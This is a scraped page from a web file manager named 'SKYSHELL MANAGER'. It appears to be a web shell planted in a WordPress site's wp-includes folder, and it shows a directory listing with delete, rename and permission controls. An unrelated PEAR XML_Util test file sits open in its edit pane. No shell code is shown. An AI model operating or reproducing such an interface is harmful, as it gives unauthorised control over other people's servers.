📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
41022.3 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: testBasic_createEndElement.phpt
--TEST-- XML_Util::createEndElement() basic tests --CREDITS-- Chuck Burgess <ashnazg@php.net> # created for v1.2.0a1 2008-05-04 --FILE-- <?php require_once 'XML' . DIRECTORY_SEPARATOR . 'Util.php'; echo '=====XML_Util::createEndElement() basic tests=====' . PHP_EOL . PHP_EOL; echo "TEST: basic usage (myTag)" . PHP_EOL; echo XML_Util::createEndElement("myTag") . PHP_EOL . PHP_EOL; echo "TEST: basic usage with a namespaced tag (myNs:myTag)" . PHP_EOL; echo XML_Util::createEndElement("myNs:myTag") . PHP_EOL . PHP_EOL; ?> --EXPECT-- =====XML_Util::createEndElement() basic tests===== TEST: basic usage (myTag) </myTag> TEST: basic usage with a namespaced tag (myNs:myTag) </myNs:myTag>
Save